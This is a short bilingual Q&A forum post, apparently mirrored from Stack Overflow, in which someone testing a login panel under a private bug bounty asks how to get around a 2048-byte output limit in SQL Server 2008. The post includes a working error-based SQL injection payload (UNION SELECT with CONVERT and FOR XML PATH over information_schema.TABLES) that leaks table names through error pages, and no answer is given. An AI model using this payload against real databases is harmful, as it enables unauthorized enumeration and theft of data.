提问人:ABDSHALEH 提问时间:4/28/2019 最后编辑:marc_sABDSHALEH 更新时间:4/28/2019 访问量:146
SQL Server 2008 中 OFFSET 语句的替代
Alternative of OFFSET statement in SQL Server 2008
问:
我正在尝试在私人漏洞赏金计划中注入 SQL。登录面板存在 SQL 注入漏洞,服务器为 SQL Server 2008。
所以我注入了一个查询,它是:
UNION
SELECT
CONVERT(INT, (SELECT Distinct TABLE_NAME AS 'data()'
FROM information_schema.TABLES
FOR XML PATH(''))), 2, 3
它在错误页面中打印表名。但问题是它只打印 2048 字节。所以我无法获取所有表名。但是我需要获取所有表。所以我尝试了 limit 和 offset 语句。
它不起作用,因为它不受 SQL Server 2008 支持。有没有办法打印出所有的表格?
答: 暂无答案
评论